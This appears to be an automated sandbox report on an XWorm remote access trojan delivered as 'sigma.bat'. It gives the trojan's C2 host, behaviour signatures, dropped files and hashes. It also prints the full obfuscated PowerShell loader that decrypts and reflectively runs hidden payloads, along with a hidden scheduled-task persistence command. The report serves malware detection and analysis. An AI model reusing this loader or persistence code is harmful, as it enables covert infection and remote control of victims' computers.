Overview

overview

10

Static

static

1

sigma.bat

windows7-x64

8

sigma.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    36s
  • max time network
    34s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-11-2024 14:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    sigma.bat

  • Size

    467KB

  • MD5

    820debc2f4f0c9222c455ad0befb35ca

  • SHA1

    2f64b6503ac7e19c37d2556c5a8096b593b152d3

  • SHA256

    722075c841ad49931e716a80a1ba276b325ee7eb7062e295140107ac73b4f9ec

  • SHA512

    c713b74b0163483a53454cfdbdf6a005950d0bf1e044698c93bfeb2e9fed2866fef0c17d5b7b6573dec062b1edcdc3e3eb8574c74a0beaeb370466d1c250d744

  • SSDEEP

    12288:vTCh8WuzcDLPRPcIA7ewthD6ERekdWYb9ACXrjuJYD5S9J:7sBut/thDZUirA2rvD49J

Score
10/10
xwormdiscoveryexecutionrattrojan

Malware Config

Extracted

Family

xworm

C2

127.0.0.1:32758

pressure-continuous.gl.at.ply.gg:32758
Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 9 IoCs
  • Unexpected DNS network traffic destination 10 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 16 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sigma.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:636
    • C:\Windows\system32\net.exe
      net file
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4884
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 file
        3⤵
          PID:3488
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tAX32kKNIA57v2PtuvPcK8ir8QplMdCOor3YMSiLeTU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wF3c9IhrNPKw6p+lQ8lg3Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KImyR=New-Object System.IO.MemoryStream(,$param_var); $RDOIU=New-Object System.IO.MemoryStream; $XQVZK=New-Object System.IO.Compression.GZipStream($KImyR, [IO.Compression.CompressionMode]::Decompress); $XQVZK.CopyTo($RDOIU); $XQVZK.Dispose(); $KImyR.Dispose(); $RDOIU.Dispose(); $RDOIU.ToArray();}function execute_function($param_var,$param2_var){ $VtPlg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DmKAS=$VtPlg.EntryPoint; $DmKAS.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\sigma.bat';$GjSSJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\sigma.bat').Split([Environment]::NewLine);foreach ($Rmxqb in $GjSSJ) { if ($Rmxqb.StartsWith(':: ')) { $CZpHS=$Rmxqb.Substring(3); break; }}$payloads_var=[string[]]$CZpHS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3048
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_132_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_132.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4772
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_132.vbs"
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:1592
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_132.bat" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4244
            • C:\Windows\system32\net.exe
              net file
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1940
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 file
                6⤵
                  PID:2112
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tAX32kKNIA57v2PtuvPcK8ir8QplMdCOor3YMSiLeTU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wF3c9IhrNPKw6p+lQ8lg3Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KImyR=New-Object System.IO.MemoryStream(,$param_var); $RDOIU=New-Object System.IO.MemoryStream; $XQVZK=New-Object System.IO.Compression.GZipStream($KImyR, [IO.Compression.CompressionMode]::Decompress); $XQVZK.CopyTo($RDOIU); $XQVZK.Dispose(); $KImyR.Dispose(); $RDOIU.Dispose(); $RDOIU.ToArray();}function execute_function($param_var,$param2_var){ $VtPlg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DmKAS=$VtPlg.EntryPoint; $DmKAS.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_132.bat';$GjSSJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_132.bat').Split([Environment]::NewLine);foreach ($Rmxqb in $GjSSJ) { if ($Rmxqb.StartsWith(':: ')) { $CZpHS=$Rmxqb.Substring(3); break; }}$payloads_var=[string[]]$CZpHS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                5⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:3584
                • C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
                  "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
                  6⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:1852
                  • C:\Windows\SYSTEM32\cmd.exe
                    "cmd" /c ipconfig /all
                    7⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1624
                    • C:\Windows\system32\ipconfig.exe
                      ipconfig /all
                      8⤵
                      • Gathers network information
                      PID:972
                  • C:\Windows\SYSTEM32\cmd.exe
                    "cmd" /c wmic nicconfig where (IPEnabled=TRUE) call SetDNSServerSearchOrder ("1.1.1.1", "1.0.0.1")
                    7⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2724
                    • C:\Windows\System32\Wbem\WMIC.exe
                      wmic nicconfig where (IPEnabled=TRUE) call SetDNSServerSearchOrder ("1.1.1.1", "1.0.0.1")
                      8⤵
                        PID:1876
                    • C:\Windows\System32\msiexec.exe
                      "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn
                      7⤵
                        PID:4976
          • C:\Windows\system32\msiexec.exe
            C:\Windows\system32\msiexec.exe /V
            1⤵
            • Blocklisted process makes network request
            • Enumerates connected drives
            • Drops file in Program Files directory
            • Drops file in Windows directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4872
            • C:\Windows\System32\MsiExec.exe
              C:\Windows\System32\MsiExec.exe -Embedding 00A268D38672B998D216E5CE1DB0F109
              2⤵
              • Loads dropped DLL
              PID:4936
            • C:\Windows\syswow64\MsiExec.exe
              C:\Windows\syswow64\MsiExec.exe -Embedding 96546D6DD2A48AC70B6330002FEF7725
              2⤵
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:1284
            • C:\Windows\syswow64\MsiExec.exe
              C:\Windows\syswow64\MsiExec.exe -Embedding 1715F4B14843FCE2AB19937845DF67CE E Global\MSI0000
              2⤵
              • Loads dropped DLL
              • Drops file in Program Files directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3680
              • C:\Windows\SysWOW64\wevtutil.exe
                "wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man"
                3⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:556
                • C:\Windows\System32\wevtutil.exe
                  "wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man" /fromwow64
                  4⤵
                    PID:404

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Program Files\nodejs\node_etw_provider.man
              Filesize

              10KB

              MD5

              1d51e18a7247f47245b0751f16119498

              SHA1

              78f5d95dd07c0fcee43c6d4feab12d802d194d95

              SHA256

              1975aa34c1050b8364491394cebf6e668e2337c3107712e3eeca311262c7c46f

              SHA512

              1eccbe4ddae3d941b36616a202e5bd1b21d8e181810430a1c390513060ae9e3f12cd23f5b66ae0630fd6496b3139e2cc313381b5506465040e5a7a3543444e76

              Download Submit

            • C:\Program Files\nodejs\node_etw_provider.man
              Filesize

              8KB

              MD5

              d3bc164e23e694c644e0b1ce3e3f9910

              SHA1

              1849f8b1326111b5d4d93febc2bafb3856e601bb

              SHA256

              1185aaa5af804c6bc6925f5202e68bb2254016509847cd382a015907440d86b4

              SHA512

              91ebff613f4c35c625bb9b450726167fb77b035666ed635acf75ca992c4846d952655a2513b4ecb8ca6f19640d57555f2a4af3538b676c3bd2ea1094c4992854

              Download Submit

            • C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\LICENSE.md
              Filesize

              818B

              MD5

              2916d8b51a5cc0a350d64389bc07aef6

              SHA1

              c9d5ac416c1dd7945651bee712dbed4d158d09e1

              SHA256

              733dcbf5b1c95dc765b76db969b998ce0cbb26f01be2e55e7bccd6c7af29cb04

              SHA512

              508c5d1842968c478e6b42b94e04e0b53a342dfaf52d55882fdcfe02c98186e9701983ab5e9726259fba8336282e20126c70d04fc57964027586a40e96c56b74

              Download Submit

            • C:\Program Files\nodejs\node_modules\npm\node_modules\aggregate-error\license
              Filesize

              1KB

              MD5

              5ad87d95c13094fa67f25442ff521efd

              SHA1

              01f1438a98e1b796e05a74131e6bb9d66c9e8542

              SHA256

              67292c32894c8ac99db06ffa1cb8e9a5171ef988120723ebe673bf76712260ec

              SHA512

              7187720ccd335a10c9698f8493d6caa2d404e7b21731009de5f0da51ad5b9604645fbf4bc640aa94513b9eb372aa6a31df2467198989234bc2afbce87f76fbc3

              Download Submit

            • C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\LICENSE
              Filesize

              754B

              MD5

              d2cf52aa43e18fdc87562d4c1303f46a

              SHA1

              58fb4a65fffb438630351e7cafd322579817e5e1

              SHA256

              45e433413760dc3ae8169be5ed9c2c77adc31ad4d1bc5a28939576df240f29a0

              SHA512

              54e33d7998b5e9ba76b2c852b4d0493ebb1b1ee3db777c97e6606655325ff66124a0c0857ca4d62de96350dbaee8d20604ec22b0edc17b472086da4babbbcb16

              Download Submit

            • C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmhook\LICENSE.md
              Filesize

              771B

              MD5

              e9dc66f98e5f7ff720bf603fff36ebc5

              SHA1

              f2b428eead844c4bf39ca0d0cf61f6b10aeeb93b

              SHA256

              b49c8d25a8b57fa92b2902d09c4b8a809157ee32fc10d17b7dbb43c4a8038f79

              SHA512

              8027d65e1556511c884cb80d3c1b846fc9d321f3f83002664ad3805c4dee8e6b0eaf1db81c459153977bdbde9e760b0184ba6572f68d78c37bff617646bcfc3b

              Download Submit

            • C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmorg\LICENSE
              Filesize

              730B

              MD5

              072ac9ab0c4667f8f876becedfe10ee0

              SHA1

              0227492dcdc7fb8de1d14f9d3421c333230cf8fe

              SHA256

              2ef361317adeda98117f14c5110182c28eae233af1f7050c83d4396961d14013

              SHA512

              f38fd6506bd9795bb27d31f1ce38b08c9e6f1689c34fca90e9e1d5194fa064d1f34a9c51d15941506ebbbcd6d4193055e9664892521b7e39ebcd61c3b6f25013

              Download Submit

            • C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-pipeline\node_modules\minipass\package.json
              Filesize

              1KB

              MD5

              d116a360376e31950428ed26eae9ffd4

              SHA1

              192b8e06fb4e1f97e5c5c7bf62a9bff7704c198b

              SHA256

              c3052bd85910be313e38ad355528d527b565e70ef15a784db3279649eee2ded5

              SHA512

              5221c7648f4299234a4637c47d3f1eb5e147014704913bc6fdad91b9b6a6ccc109bced63376b82b046bb5cad708464c76fb452365b76dbf53161914acf8fb11a

              Download Submit

            • C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\LICENSE
              Filesize

              802B

              MD5

              d7c8fab641cd22d2cd30d2999cc77040

              SHA1

              d293601583b1454ad5415260e4378217d569538e

              SHA256

              04400db77d925de5b0264f6db5b44fe6f8b94f9419ad3473caaa8065c525c0be

              SHA512

              278ff929904be0c19ee5fb836f205e3e5b3e7cec3d26dd42bbf1e7e0ca891bf9c42d2b28fce3741ae92e4a924baf7490c7c6c59284127081015a82e2653e0764

              Download Submit

            • C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\index.js
              Filesize

              16KB

              MD5

              bc0c0eeede037aa152345ab1f9774e92

              SHA1

              56e0f71900f0ef8294e46757ec14c0c11ed31d4e

              SHA256

              7a395802fbe01bb3dc8d09586e0864f255874bf897378e546444fbaec29f54c5

              SHA512

              5f31251825554bf9ed99eda282fa1973fcec4a078796a10757f4fb5592f2783c4ebdd00bdf0d7ed30f82f54a7668446a372039e9d4589db52a75060ca82186b3

              Download Submit

            • C:\Program Files\nodejs\node_modules\npm\node_modules\nopt\LICENSE
              Filesize

              780B

              MD5

              b020de8f88eacc104c21d6e6cacc636d

              SHA1

              20b35e641e3a5ea25f012e13d69fab37e3d68d6b

              SHA256

              3f24d692d165989cd9a00fe35ca15a2bc6859e3361fa42aa20babd435f2e4706

              SHA512

              4220617e29dd755ad592295bc074d6bc14d44a1feeed5101129669f3ecf0e34eaa4c7c96bbc83da7352631fa262baab45d4a370dad7dabec52b66f1720c28e38

              Download Submit

            • C:\Program Files\nodejs\node_modules\npm\node_modules\promise-all-reject-late\LICENSE
              Filesize

              763B

              MD5

              7428aa9f83c500c4a434f8848ee23851

              SHA1

              166b3e1c1b7d7cb7b070108876492529f546219f

              SHA256

              1fccd0ad2e7e0e31ddfadeaf0660d7318947b425324645aa85afd7227cab52d7

              SHA512

              c7f01de85f0660560206784cdf159b2bdc5f1bc87131f5a8edf384eba47a113005491520b0a25d3cc425985b5def7b189e18ff76d7d562c434dc5d8c82e90cce

              Download Submit

            • C:\Program Files\nodejs\node_modules\npm\node_modules\tar\node_modules\fs-minipass\node_modules\minipass\index.d.ts
              Filesize

              4KB

              MD5

              f0bd53316e08991d94586331f9c11d97

              SHA1

              f5a7a6dc0da46c3e077764cfb3e928c4a75d383e

              SHA256

              dd3eda3596af30eda88b4c6c2156d3af6e7fa221f39c46e492c5e9fb697e2fef

              SHA512

              fd6affbaed67d09cf45478f38e92b8ca6c27650a232cbbeaff36e4f7554fb731ae44cf732378641312e98221539e3d8fabe80a7814e4f425026202de44eb5839

              Download Submit

            • C:\Program Files\nodejs\node_modules\npm\node_modules\treeverse\LICENSE
              Filesize

              771B

              MD5

              1d7c74bcd1904d125f6aff37749dc069

              SHA1

              21e6dfe0fffc2f3ec97594aa261929a3ea9cf2ab

              SHA256

              24b8d53712087b867030d18f2bd6d1a72c78f9fb4dee0ce025374da25e4443b9

              SHA512

              b5ac03addd29ba82fc05eea8d8d09e0f2fa9814d0dd619c2f7b209a67d95b538c3c2ff70408641ef3704f6a14e710e56f4bf57c2bb3f8957ba164f28ee591778

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
              Filesize

              3KB

              MD5

              6b8559593a74eb3b15c53a9fac9a469f

              SHA1

              13af213d1417edf30c03f76f9242c1975b2e4e74

              SHA256

              e053d1faabd6b36371f452e79cf70591cf45403a671746136a87198694a8fdb9

              SHA512

              699b11eda97866809b696c96304bc218d7b72623fd537f83721f36a6c617d854fda7b6f01f7cb0bc0d55189c386e9b9fe6d111bb7c76cce492572b0a9961e974

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Filesize

              1KB

              MD5

              ff2ebc63009127bf2c74f18dc727774e

              SHA1

              603a245252097e9b8d6823e08a76361ba94f7720

              SHA256

              5048a68ea6a51a2a93fba28d043dbcc8ae067225e4e1b9569a74caac617e9a42

              SHA512

              15b4baf594f91eba3ad7d390859140220da191bfc9de2eeeca5455a643ce5b19cd88b221e354d6a577df799564cc73285f2418108d2b850630196053ac53007b

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
              Filesize

              800KB

              MD5

              2a4dcf20b82896be94eb538260c5fb93

              SHA1

              21f232c2fd8132f8677e53258562ad98b455e679

              SHA256

              ebbcb489171abfcfce56554dbaeacd22a15838391cbc7c756db02995129def5a

              SHA512

              4f1164b2312fb94b7030d6eb6aa9f3502912ffa33505f156443570fc964bfd3bb21ded3cf84092054e07346d2dce83a0907ba33f4ba39ad3fe7a78e836efe288

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zhbsvfop.kdc.ps1
              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi
              Filesize

              30.1MB

              MD5

              0e4e9aa41d24221b29b19ba96c1a64d0

              SHA1

              231ade3d5a586c0eb4441c8dbfe9007dc26b2872

              SHA256

              5bfb6f3ab89e198539408f7e0e8ec0b0bd5efe8898573ec05b381228efb45a5d

              SHA512

              e6f27aecead72dffecbeaad46ebdf4b1fd3dbcddd1f6076ba183b654e4e32d30f7af1236bf2e04459186e993356fe2041840671be73612c8afed985c2c608913

              Download Submit

            • C:\Users\Admin\AppData\Roaming\startup_str_132.bat
              Filesize

              467KB

              MD5

              820debc2f4f0c9222c455ad0befb35ca

              SHA1

              2f64b6503ac7e19c37d2556c5a8096b593b152d3

              SHA256

              722075c841ad49931e716a80a1ba276b325ee7eb7062e295140107ac73b4f9ec

              SHA512

              c713b74b0163483a53454cfdbdf6a005950d0bf1e044698c93bfeb2e9fed2866fef0c17d5b7b6573dec062b1edcdc3e3eb8574c74a0beaeb370466d1c250d744

              Download Submit

            • C:\Users\Admin\AppData\Roaming\startup_str_132.vbs
              Filesize

              115B

              MD5

              d01ef686a32d9eb2653ebde3698ab3ed

              SHA1

              e5ebad50d0dbd58cfee2bd674ce0a8e735180079

              SHA256

              f97e5c1c069825a3f0462faea1cc1acdb40083ea4bf6ebd33f8dd33b5ef4048a

              SHA512

              2599ed02753bef1288834368dbcf7df1fa6eb5bd7c854e6542a27aae227679a7a9ab2f3b9245de05f0341c62bf71b7baf8292d5e9123dfd14c3047c9dfc6d0ae

              Download Submit

            • C:\Windows\Installer\MSI16F2.tmp
              Filesize

              297KB

              MD5

              7a86ce1a899262dd3c1df656bff3fb2c

              SHA1

              33dcbe66c0dc0a16bab852ed0a6ef71c2d9e0541

              SHA256

              b8f2d0909d7c2934285a8be010d37c0609c7854a36562cbfcbce547f4f4c7b0c

              SHA512

              421e8195c47381de4b3125ab6719eec9be7acd2c97ce9247f4b70a309d32377917c9686b245864e914448fe53df2694d5ee5f327838d029989ba7acafda302ec

              Download Submit

            • C:\Windows\Installer\MSIE43.tmp
              Filesize

              122KB

              MD5

              9fe9b0ecaea0324ad99036a91db03ebb

              SHA1

              144068c64ec06fc08eadfcca0a014a44b95bb908

              SHA256

              e2cce64916e405976a1d0c522b44527d12b1cba19de25da62121cf5f41d184c9

              SHA512

              906641a73d69a841218ae90b83714a05af3537eec8ad1d761f58ac365cf005bdd74ad88f71c4437aaa126ac74fa46bcad424d17c746ab197eec2caa1bd838176

              Download Submit

            • C:\Windows\Installer\MSIED2.tmp
              Filesize

              211KB

              MD5

              a3ae5d86ecf38db9427359ea37a5f646

              SHA1

              eb4cb5ff520717038adadcc5e1ef8f7c24b27a90

              SHA256

              c8d190d5be1efd2d52f72a72ae9dfa3940ab3faceb626405959349654fe18b74

              SHA512

              96ecb3bc00848eeb2836e289ef7b7b2607d30790ffd1ae0e0acfc2e14f26a991c6e728b8dc67280426e478c70231f9e13f514e52c8ce7d956c1fad0e322d98e0

              Download Submit

            • memory/1852-62-0x00000278817E0000-0x00000278818AE000-memory.dmp

              Filesize

              824KB

              Download

            • memory/3048-48-0x00007FFEF62A0000-0x00007FFEF6D61000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/3048-0-0x00007FFEF62A3000-0x00007FFEF62A5000-memory.dmp

              Filesize

              8KB

              Download

            • memory/3048-14-0x000001761A5B0000-0x000001761A68C000-memory.dmp

              Filesize

              880KB

              Download

            • memory/3048-13-0x000001761A2A0000-0x000001761A2A8000-memory.dmp

              Filesize

              32KB

              Download

            • memory/3048-12-0x00007FFEF62A0000-0x00007FFEF6D61000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/3048-11-0x00007FFEF62A0000-0x00007FFEF6D61000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/3048-1-0x000001767E700000-0x000001767E722000-memory.dmp

              Filesize

              136KB

              Download

            • memory/3584-51-0x00000269FB510000-0x00000269FB52A000-memory.dmp

              Filesize

              104KB

              Download

            • memory/4772-29-0x00007FFEF62A0000-0x00007FFEF6D61000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/4772-17-0x00007FFEF62A0000-0x00007FFEF6D61000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/4772-16-0x00007FFEF62A0000-0x00007FFEF6D61000-memory.dmp

              Filesize

              10.8MB

              Download